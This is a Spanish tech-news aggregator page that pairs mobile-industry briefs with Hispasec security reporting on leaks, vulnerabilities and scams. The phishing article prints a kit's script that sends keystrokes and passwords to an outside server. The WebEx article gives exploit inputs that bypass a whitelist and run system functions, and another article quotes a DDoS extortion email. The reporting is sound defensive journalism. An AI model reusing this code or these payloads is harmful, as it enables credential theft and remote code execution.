You are here

Noticias

Rumores contradictorios sobre los fabricantes de chips para iPhone

Canal PDA - Tue, 25/07/2017 - 09:57
Algunas publicaciones afirman y otras niegan que Samsung volverá a producir chips para los iPhones de Apple, tras haber desaparecido previamente de la lista de proveedores. Hace unos días, varias informaciones publicadas en Corea del Sur afirmaban que Samsung se llevaría una parte del contrato para producir chips de iPhone, al lado del (por ahora […]
Categories: PDA / PPC

Millones de datos de personal militar, testigos protegidos y material militar filtrados por el gobierno sueco.

Hispasec - Mon, 24/07/2017 - 12:00
El gobierno sueco ha expuesto datos sensibles de millones de ciudadanos. Sin embargo, las consecuencias no han ido más lejos de, al cambio, 8,500$
¿Cómo comenzó todo? En 2015, la Agencia de Transportes sueca (STA, de ahora en adelante) llegó a un acuerdo de mantenimiento de equipos informáticos para gestionar sus bases de datos y redes con IBM Suecia.

La STA subió su base de datos completa a servidores en la nube de IBM, la cual contenía detalles sobre todos los vehículos del país incluyendo aquellos correspondientes a la policía, registros militares e incluso testigos protegidos.



Y fue esa misma base de datos es la que la agencia de transportes envió a vendedores suscritos, y además en texto plano, sin cifrar. Al descubrirse el error, la agencia de transportes simplemente envió un nuevo e-mail, pidiendo a las personas suscritas que eliminarán la base de datos completa que ellos mismos habían mandado anteriormente.

Pero el escándalo no acaba aquí. La subcontratación llevada a cabo con IBM permitía el acceso desde fuera de Suecia a los sistemas de la STA sin pasar por medidas de seguridad necesarias. Los administradores de IBM en la República Checa tenían acceso a todos los datos y registros, mientras que otra empresa en Serbia administraba las comunicaciones.

Según Rick Falkvinge, fundador de la VPN Private Internet Access, quien hizo público el escándalo, los datos incluidos en esta filtración incluyen:
  • Capacidad de todas las carreteras y puentes.
  • Nombres, fotos y direcciones de pilotos de combate de las fuerzas aéreas..
  • Nombres, fotos y direcciones de todos los incluidos en el registro policial, los cuales se creían datos clasificados.
  • Nombres, fotos y direcciones de todos los operadores de las unidades de élite del país, el equivalente a los Navy SEAL. 
  • Nombres, fotos, y direcciones de todos los testigos protegidos.
  • Tipo, módelo, tamaño, e incluso defectos en todos los vehículos militares, incluyendo sus operadores.
A pesar de que la brecha se produjo en 2015, no fue descubierta hasta 2016 y acabó con la renuncia de Maria Agren, directora general de la STA, en enero de 2017, además de una multa de 8,500$.

Lo más preocupante: La base de datos no será segura hasta este otoño, según palabras del nuevo director general Jonas Bjelfvenstam.

Más información:
https://www.bleepingcomputer.com/news/security/biggest-data-leak-in-swedens-history-punished-with-half-a-months-paycheck/

Fernando Díazfdiaz@hispasec.com@entdark_
Categories: Seguridad

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

Hispasec - Sun, 23/07/2017 - 16:25
No es novedad que a diario se venden miles de herramientas de hacking usadas con fines maliciosos. Estas herramientas, por regla general, requieren de un mínimo de conocimiento por parte del ciberdelincuente, pero a día de hoy esto está cambiando, y es que ya existen plataformas para realizar múltiples tipos de ataques sin saber siquiera el nombre del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas que se pueden encontrar por Internet. El nombre de la web no va a ser publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin embargo contiene numerosos tipos de ataques los cuáles están gravemente penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el cuál nos indica que tienen un pequeño tutorial para nosotros.

Bienvenida a la plataforma
Al avanzar, nos encontramos un “about” de la web. Nos explica que la página nos da acceso a una serie de “complejas herramientas” y que en pocos pasos vamos a aprender a usar una de ellas de manera gratuita.
Realmente las herramientas a las que te dan acceso son muy simples y apenas requieren de conocimientos para hacer el ataque de forma manual.
Por supuesto, no era de dudar que cuenta con una versión PREMIUM para sacar más provecho a la herramienta.
Avanzamos a través de los paneles y podemos comprobar cómo el primer ataque que nos enseña es la realización de un phishing a Facebook.
Cómo hackear una cuenta de Facebook!
Aunque nuestros lectores están habituados a escuchar la palabra phishing, vamos a recordar que es un  ataque de phishing aquel que mediante ingeniería social, se centra en adquirir cierta información confidencial de la víctima. Para ello, el cibercriminal se hace pasar por una persona o entidad (en este caso por la red social Facebook) para solicitarle esa información.
Un par de clicks y nos genera un enlace con una burda versión de la página de Facebook para que se la enviaemos a nuestra víctima.
Al ver la web cualquier persona con unos conocimientos mínimos no caería ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí que podría pensar que es una página legítima.
Enlaces generados para el ataque de phishingPágina de Facebook generada para el ataque
Pero algo todavía mucho más llamativo, es que al escribir la contraseña ni siquiera oculte los caracteres como haría un campo de tipo contraseña.

Detalles de la contraseña en texto claro
Si comprobamos el código fuente de la web generada para el ataque, vemos que apenas son 127 líneas. Dentro de ellas, podemos encontrar un hotlinking a los iconos de Facebook en una página externa a Facebook:
http://www.questionpro.com/qp_userimages/sub-2/1419981/Facebook.png?userFileID=259491
http://www.portugalrx.com/wp-content/uploads/2016/02/facebook_logo.png
También podemos ver el script que nos redirecciona a Facebook una vez “iniciamos sesión en la página”:
<script type="text/javascript">
var BigData = {
id: '3015',
token: 'i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s',
name: 'Facebook',
site_id: '9',
redirect: 'http://www.facebook.com/login',
hsData: "9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221",
};
var socket = io('https://pod-1.logshit.com');
socket.on('ping', function (data) {
socket.emit('hello', BigData );
});
socket.on('redirect', function(data){
window.location = BigData.redirect;
});
$(document).ready(function(){
$('body').click(function(e){
this.BigData = BigData;
socket.emit('clicked', this.BigData);
});
$('body').on('keyup', function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit('keyup', this.BigData);
});
});
$("#login_form").keypress(function(e) {
if (e.which == 13) {
$("#submit").click();
}
});
$("#submit").click(function(e) {
e.preventDefault();
if ($("#username").val() == "") {
var err = "1";
alert('Username cannot be left empty');
}
if ($("#password").val() == "") {
var err = "1";
alert('Password cannot be left empty');
}
if (err != "1") {
socket.emit('log', {
username : $("#username").val(),
password : $("#password").val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});
</script>

Es un ataque de phishing muy básico pero que cualquier persona podría realizar sin ningún tipo de complicación ni conocimientos.
Al terminar de preparar el ataque, te recomiendan otras dos guías. La primera de ellas es para realizar un phishing a un correo electrónico y la segunda para ver los logs de las personas que han picado en el ataque.
Guías que ofrece el servicio
Si nos dirigimos al apartado de nuestra web creada, veremos cómo aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas
Indagando un poco más en la página, podemos ver cómo ofrecen este servicio para realizar este tipo de ataque a 26 webs diferentes.
Servicios contra los que se puede crear un phishing a golpe de click
También cuentan con un market en el que puedes comprar o vender servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin hasta Paypal pasando por Western Union y MoneyGram.
Servicios de pago aceptados
Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar que tenemos acceso a más servicios, los cuáles parecen ser igual de mediocres que el anterior pero que con una víctima inexperta y un poco de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma
Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en día realizar acciones maliciosas en Internet no es complicado ni requiere de conocimientos Informáticos, pero en España puede llegar a incurrir en penas de 6 meses a 3 años de prisión. 
Para finalizar, recalcar que esta es una de las muchas plataformas de creación de phishing gratuitas que hay por Internet. Algunas más simples, otras más complejas, pero todas pueden ser usadas para realizar acciones maliciosas altamente penadas.

Daniel Púadpua@hispasec.com
Categories: Seguridad

Ejecución remota de código en el SDK Source de Valve

Hispasec - Sun, 23/07/2017 - 11:33
El investigador privado Justin Taft (@JustTaft), perteneciente a la firma One Up Security, ha demostrado recientemente que el motor de juegos Source de la empresa Valve se veía afectado por una ejecución remota de código que ha sido finalmente solucionada.
Source es el motor oficial de videojuegos utilizado por Valve para sus diferentes títulos, como Counter Strike:GO, Teamfortress 2, Half-Life 2: Deathmatch, etc... y también usado por terceros de manera gratuita, para el desarrollo de mods propios.
La vulnerabilidad se debe a una falta de comprobación de límites en la función 'nexttoken', al no controlar correctamente que el buffer 'token' pueda desbordarse. Este desbordamiento (buffer overflow) podría ser aprovechado como se puede ver en el video publicado, para ejecutar código arbitrario, ya que la función afectada es llamada por un una clase (CRagdollCollisionRulesParse) encargado de cargar datos externos de modelos Ragdoll cuando se realizan determinados eventos, por ejemplo cuando un jugador es eliminado.
Video demostrativo de la vulnerabilidad:




Desde Valve se han publicado las actualizaciones oportunas tanto del SDK como del cliente Steam, aunque también existes contramedidas y/o parches disponibles para los mods ya publicados, facilitadas por el investigador:
Parche disponible:
https://oneupsecuritycdn-8266.kxcdn.com/static/blog/hl2-rce/nexttoken.patch


Más información:

Remote Code Execution In Source Games
https://oneupsecurity.com/research/remote-code-execution-in-source-games

Update Released for Counter-Strike: Source, Day of Defeat: Source, Half-Life Deathmatch: Source, Half-Life 2: Deathmatch, and the Source SDK 2013 Base
http://store.steampowered.com/news/30120/


José Mesajmesa@hispasec.com
Categories: Seguridad

Devil’s Ivy: Una vulnerabilidad que afecta a millones de dispositivos IoT

Hispasec - Fri, 21/07/2017 - 10:54
Sale a la luz una nueva vulnerabilidad (denominada Devil’s Ivy) que infecta a millones de dispositivos. Este fallo permite ejecutar código remoto en gran parte de los dispositivos IoT: cámaras, lectores de tarjeta, etc.

Los encargados de este descubrimiento son los investigadores de seguridad de la empresa Senrio. Según afirman estos trabajadores, encontraron el fallo analizando el firmware de una cámara Axis M3004.

La vulnerabilidad consiste en un buffer overflow, que los trabajadores de Senrio consiguieron explotar para ejecutar código remoto en la cámara arriba mencionada, tal y como podemos apreciar en el siguiente vídeo.

Demostración de Devil’s Ivy en Axis M3004 por Senrio Labs:

Devil's Ivy Exploit in Axis Security Camera from Senrio Labs on Vimeo.

Después de contactar con los distribuidores de estas cámaras (Axis Communications), la empresa les confirmó que la vulnerabilidad afectaba a unos 249 modelos diferentes de cámaras fabricadas por ellos.

La vulnerabilidad, con CVE-2017-9765 se encuentra en la librería de código abierto gSOAP (Simple Object Access Protocol).

gSOAP es un conjunto de herramientas de servicio web ampliamente usado y desarrollado por Genivia. Muchos programadores lo utilizan como parte de su software para permitir a los dispositivos comunicarse con Internet. Según Genivia, la librería ha sido descargada de su página web más de un millón de veces.


Más información:
Devil's Ivy: The Technical Details
http://blog.senr.io/devilsivy.html

Descarga del último firmware de Axis
https://www.axis.com/global/es/support/firmware

Actualización de gSOAP
https://www.genivia.com/downloads.html

Daniel Púadpua@hispasec.com
@arrowcode_

Categories: Seguridad

Samsung da los toques finales al Note 8

Canal PDA - Fri, 21/07/2017 - 09:58
Samsung celebrará el 23 de agosto un acto en Nueva York en el que presentará el próximo dispositivo de su marca Galaxy Note, con el que quiere dejar atrás el desastre que siguió al lanzamiento del Galaxy Note 7 en el 2016.Si bien el gigante surcoreano no ha revelado aún el nombre del dispositivo, sí […]
Categories: PDA / PPC

El consejero delegado de Vodafone apuesta por los paquetes con contenido

Canal PDA - Fri, 21/07/2017 - 09:55
Vittorio Colao, consejero delegado del Grupo Vodafone, ha afirmado en la conferencia sobre los resultados de la empresa durante el primer trimestre que el contenido empaquetado y el no contabilizado (zero rating) podrían satisfacer la demanda creciente de datos sin necesidad de “tirar la toalla” y pasarse a las tarifas ilimitadas. Durante el período de […]
Categories: PDA / PPC

CaixaBank y Visa llegarán este año a Apple Pay en España

Canal PDA - Thu, 20/07/2017 - 17:58
Antes de finales de año, los clientes de CaixaBank y de imaginBank podrán incorporar sus tarjetas bancarias a Apple Pay, el sistema de pago para sus iPhones y sus relojes Watch. Desde que la plataforma llegó a España en noviembre de 2016, sólo podían utilizarla los clientes del Banco Santander y los titulares de las […]
Categories: PDA / PPC

Disponible herramienta para descifrar Petya/GoldenEye, el ransomware de la calavera

Hispasec - Thu, 20/07/2017 - 13:24
Hagamos memoria: Petya (GoldenEye siendo una de sus variantes) es un crypto-ransomware conocido desde marzo de 2016. Recordamos que un crypto-ransomware cifra archivos del usuario y pide un rescate por descifrarlos. 

La temible pantalla que anuncia el secuestro


Técnicamente, Petya se caracteriza porque su principal forma de secuestro es cifrar la MFT (índice de archivos en disco), en vez de cifrar los archivos uno a uno como habitualmente (algunas versiones de Petya también tienen esta opción). Curiosamente, más que ser conocido por la versión del autor original, es más famoso por EternalPetya, una versión pirateada (sí, se piratea malware) que afectó principalmente a Ucrania. Tuvo bastante más tirón mediático porque se sospecha que fue un ataque con motivación política.

La noticia es que para las versiones originales de Petya, el autor ha publicado su clave privada, lo que permite descifrar los archivos de las víctimas. @hsherezade, una investigadora independiente en seguridad de la información, ha publicado una herramienta que usa la clave publicada para descifrar los archivos. La herramienta está en versión beta, y como siempre se recomienda antes de intentar el descifrado, lo ideal es hacer una copia de seguridad del original cifrado por si el proceso de descifrado falla e inutiliza definitivamente nuestros archivos.

Las versiones descifrables son las siguientes:
  • Red Petya
  • Green Petya (ambas versiones)
  • GoldenEye Petya
Todas las versiones se reconocen fácilmente porque el nombre hace referencia al color del aviso que notifica la infección (rojo, verde o dorado/amarillo). Este blog detalla con capturas de pantalla cada una de las versiones comentadas, así como algunas versiones no oficiales (que no son descifrables por esta herramienta).

El enlace a la herramienta que descifra las versiones originales de Petya:

https://github.com/hasherezade/petya_key

La herramienta está publicada en código fuente, por lo que es necesario compilarla antes de usarla.



Más información:

The key to old Petya versions has been published by the malware authorhttps://blog.malwarebytes.com/cybercrime/2017/07/the-key-to-the-old-petya-has-been-published-by-the-malware-author/Keeping up with the Petyas: Demystifying the malware family
https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/
Petya, un nuevo ransomware que impide el acceso al disco duro
http://unaaldia.hispasec.com/2016/03/petya-un-nuevo-ransomware-que-impide-el.html
Petya es el nuevo ransomware que causa estragos en todo el mundo
http://unaaldia.hispasec.com/2017/06/petya-es-el-nuevo-ransomware-que-causa.html

Carlos Ledesmacledesma@hispasec.com
Categories: Seguridad

Segundo trimestre difícil para Millicom pese a los éxitos en 4G

Canal PDA - Thu, 20/07/2017 - 09:51
La operadora Millicom tiene que hacer frente a pérdidas netas tras la caída de los ingresos en el segundo trimestre, aunque la empresa haya experimentado el “mejor trimestre de su historia” en adición de abonados de 4G. La empresa, que opera en América Latina y África, ha sufrido una caída de ingresos de un 1,5% […]
Categories: PDA / PPC

Los ciberdelincuentes encuentran en los ataques DDoS nuevas formas de extorsión

Hispasec - Wed, 19/07/2017 - 18:07
Durante el mes de julio se está detectando una nueva campaña de email que tienen como objetivo la extorsión a empresas mediante la amenaza de que sus equipos sufrirán un ataque en los próximos días, a no ser que reciban una cantidad de dinero en Bitcoin en la cuenta que indican los atacantes.

Los primeros ataques detectados compartían una cuenta de Bitcoin en todos los emails que enviaban, por lo que hacía pensar que, aún haciendo el pago, los atacantes no podían trazar la empresa que había procedido con el, y por consiguiente no se llevaría a cabo ningún ataque. De este ataque ya se hizo eco INCIBE a través de su web.

Pero estos nuevos intentos de extorsión que hemos detectado vienen acompañados de un ataque de DDoS previo al email y fijan una hora límite para recibir el pago, en caso contrario, procederán a llevar a cabo el ataque.

Adjuntamos correo tipo.
De: Kadyrovtsy <Kadyrovite@protonmail.com>
Asunto: Ataque DDoS
REENVIE ESTE CORREO A QUIEN SEA IMPORTANTE EN SU EMPRESA Y TENGA PODER DE DECISION!

Somos Kadyrovtsy
http://lmgtfy.com/?q=Kadyrovtsy+andorra+telecom

En este mismo instante estamos iniciando un ataque de denegación de servicio en una de sus direcciones IP(XXX.XXX.XXX.XXX) Este ataque durara 10 minutos y es para que vea que somos serios.

Todos sus servidores van a ser atacados empezando este viernes {fecha}. GMT !!! Lanzaremos un nuevo ataque de denegación de servicio con una potencia de 300 Gbps, dejandole su sitio web totalmente inaccesible.

Puede detener este ataque pagando 0.5 bitcoin en la siguiente dirección bitcoin: {btc}

Si no sabe como comprar bitcoins busque en Google o adquiéralos en la empresa española Bit2me. El pago ha de recibirse antes de la fecha arriba indicada o el ataque comenzará.

Bitcoin es anónimo, nadie se enterara que su empresa ha pagado.

Aún no sabemos si los atacantes cumplen con su amenaza en caso de no haber efectuado el pago. No obstante, el hecho de que se estén utilizando distintas cuentas de Bitcoins y de llevar a cabo un ataque con anterioridad nos induce a pensar que podrían perpetrar dicho ataque.

Quedamos a la espera de conocer más detalles y os animamos a compartir información que tengáis sobre esta forma de extorsión.

Fernando Ramírezframirez@hispasec.com@fdrg21
Categories: Seguridad

El cambio de divisa y el prepago impulsan los beneficios de América Móvil

Canal PDA - Wed, 19/07/2017 - 09:47
América Móvil informa de que sus beneficios netos han crecido un 86% interanual en el segundo trimestre, porque ha incrementado sus clientelas de telefonía fija y móvil postpago y se ha beneficiado de tipos de cambio favorables. El grupo, que opera todo en el continente americano, ha obtenido unos beneficios de 14.300 millones de pesos […]
Categories: PDA / PPC

Google presenta un servicio de noticias que compite con el de Facebook

Canal PDA - Wed, 19/07/2017 - 09:43
Google ha anunciado “un nuevo servicio de noticias” que funcionará en su aplicación base, con algoritmos de aprendizaje automático actualizados que detectarán qué es lo que el usuario desea ver. Según Reuters, dicha novedad permitirá que la empresa compita directamente con las redes sociales como Facebook. El nuevo servicio de noticias de Google -similar a […]
Categories: PDA / PPC

El plan europeo de ocho puntos para impulsar la 5G

Canal PDA - Wed, 19/07/2017 - 09:41
Representantes de los Estados miembros de la UE y de Noruega han acordado una serie de medidas para lograr el éxito en el despliegue de la 5G en toda la región. Dichas medidas incluyen una consolidación de las políticas de espectro y el apoyo a las tecnologías asociadas.En una reunión ministerial en Tallin (Estonia), los […]
Categories: PDA / PPC

Las operadoras peruanas acuerdan colaborar en caso de desastres naturales

Canal PDA - Tue, 18/07/2017 - 18:25
Las operadoras móviles Bitel, Claro, Entel y Telefónica han emprendido la iniciativa “Nos importa Perú”, en virtud de la cual trabajarán conjuntamente para preparar la respuesta en caso de desastres naturales y emergencias humanitarias. Las citadas compañías, que suman en conjunto más de 30 millones de líneas de móvil, se han adherido a la Carta […]
Categories: PDA / PPC

MediaTek entiende que NB-IoT supone una “gran oportunidad”

Canal PDA - Tue, 18/07/2017 - 17:55
ENTREVISTA: Jerry Yu (en la foto), vicepresidente corporativo de la firma productora de chips MediaTek, ha declarado a Mobile World Live que está convencido de que su módulo de LPWA (siglas inglesas de “bajo consumo y área extensa”) contribuirá a impulsar el desarrollo de Internet de las Cosas. Según la empresa, dicho módulo es el […]
Categories: PDA / PPC

Samsung recuperará metales raros presentes en los Note 7

Canal PDA - Tue, 18/07/2017 - 17:53
Samsung recuperará 157 toneladas de metales raros procedentes de los smartphones Galaxy Note 7 retirados y reutilizará componentes de dichos teléfonos. La firma, que es el mayor fabricante mundial de smartphones, quiere minimizar el impacto medioambiental provocado por la retirada del modelo Galaxy Note 7 y recuperará metales como cobalto, cobre, oro y plata que […]
Categories: PDA / PPC

Graves vulnerabilidades en la extensión de navegadores de Cisco WebEx

Hispasec - Tue, 18/07/2017 - 12:15
Cisco WebEx es un servicio de videoconferencias que cuenta con varias aplicaciones para poder interaccionar con él. Desde la aplicación de escritorio, aplicaciones móviles, web y extensiones de navegador.

Son precisamente estas últimas donde se encuentran las vulnerabilidades reportadas por Cris Neckar de Divergent Security y Tavis Ormandy de Google. Lo errores pueden llegar a producir una ejecución remota de código.


- La primera de ellas se encuentra al leer el JSON. WebEx utiliza dentro de la librería "atgpcext" un parser de JSON propio para procesar los mensajes desde el cliente.

El siguiente código muestra cómo se podría crear 2 atributos con el mismo nombre.

var c = e.GpcExtName;
if (c && (c = c.trim(),
"atgpcext" != c.toLowerCase() && "atgpcext" != atob(c).toLowerCase().trim()))
return !1;
var d = e.GpcUnpackName;
if (d && (d = d.trim(),
"atgpcdec" != d.toLowerCase() && "atgpcdec" != atob(d).toLowerCase().trim()))
return !1;
var f = e.GpcInitCall;
if (f && !a.verifyScriptCall(atob(f.trim())))

Para ello bastaría con utilizar un diccionario con el siguiente contenido:
object={ "foo": 1, "foo\0": 2 }
Lo cual provocaría que se crearan 2 atributos con el nombre "foo", uno con el valor 1, que sería visible por el navegador Chrome y otro con el valor 2, que sería visible por la librería "atgpcext".

- La segunda vulnerabilidad se encuentra en una expresión regular incompleta en "GpcScript". Para la interacción de WebEx con los componentes nativos del sistema se utiliza JavaScript. El siguiente código se corresponde con la función que verifica que la entrada sea correcta:

a.verifyScriptCall = function(a) {
var b = /^(WebEx_|A[sT][ADEPSN]|conDll|RA[AM])|^(Ex|In)it|^(FinishC|Is[NS]|JoinM|[NM][BCS][JRUC]|Set|Name|Noti|Trans|Update)|^(td|SCSP)$/;
if (10240 < a.length)
return !1;
a = a.split(";");
for (var c = 0; c < a.length; c++) {
var d = a[c].trim()
, f = ""
, g = d.indexOf("=");
0 <= g && (d = d.substring(g + 1).trim());
g = d.indexOf("(");
0 <= g && (f = d.substring(g + 1),
d = d.substring(0, g).trim());
g = f.split(",");
if (1024 < f.length || 20 < g.length || 0 < d.length && !d.match(b))
return !1
}
return !0
}

Si un atacante malicioso introdujese la entrada _wsystem(Calc)=WebEx_Exploit;, el sistema la aceptaría y funcionaría:

Esto permitiría a un atacante remoto llamar y ejecutar cualquier función exportada de cualquier librería del sistema, lo cual se traduce en una ejecución de código remoto arbitrario.

- La tercera vulnerabilidad residen en la llamada de funciones que se encuentra en lista blanca, con parámetros bajo el control del usuario.

Cualquier función que se encuentre en la lista blanca de funciones a exportar por WebEx acepta parámetros. Por ejemplo "atmccli!WebEx_AutoLaunch", la cual está permitida, pero el parámetro o parámetros son objetos controlados por el usuario. La rutina hará una llamada virtual que puede resultar en una ejecución de código arbitrario. Con el siguiente JSON se podría ejecutar código arbitrario de la dirección ObjectAddress:

{
ObjectAddress: "1094795585",
GpcInitCall: "WebEx_AutoLaunch(ObjectAddress, ObjectAddress, ObjectAddress);"
}

- La última vulnerabilidad se reside en que cualquier atacante puede actualizar a una versión anterior del plugin configurando los parámetros "GpcExtVersion" y "GpcUrlRoot". En este caso se comprueba la firma del binario, pero el atacante podría volver a una versión en la que el plugin sea vulnerable a otros ataques.


Los productos vulnerables son:
- Plugin para Google Chrome, versiones anteriores a 1.0.12
- Extensión para Mozilla Firefox, versiones anteriores a 1.0.12

Cisco recomienda actualizar los plugin de navegador y las aplicaciones de escritorio.

Más información:

Cisco Security Advisory - Cisco WebEx Browser Extension Remote Code Execution Vulnerability
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170717-webex

Cisco: WebEx Various GPC Sanitization bypasses permit Arbitrary Remote Command Execution
https://bugs.chromium.org/p/project-zero/issues/detail?id=1324


Antonio Sánchezasanchez@hispasec.com
Categories: Seguridad

Acuerdo entre Samsung y PayPal para ampliar las opciones de pago

Canal PDA - Mon, 17/07/2017 - 17:50
Samsung Pay ha firmado un acuerdo estratégico con PayPal para que las transacciones en tiendas se puedan realizar con el saldo de PayPal, además de facilitar las compras en línea a los usuarios de la aplicación. Un comunicado de Samsung confirma que el servicio estará disponible inicialmente en los Estados Unidos y que luego se […]
Categories: PDA / PPC

Telegram bloqueará algunos canales tras ser prohibido en Indonesia

Canal PDA - Mon, 17/07/2017 - 17:48
El fundador del polémico servicio de mensajería cifrada Telegram se ha comprometido a cerrar canales públicos “relacionados con el terrorismo” después de que las autoridades indonesias hayan bloqueado el acceso a la plataforma por haber contribuido a difundir “propaganda radical y terrorista”.El pasado día 14 de julio, el gobierno indonesio bloqueó el acceso a Telegram […]
Categories: PDA / PPC

Pages

Subscribe to Bytecoders aggregator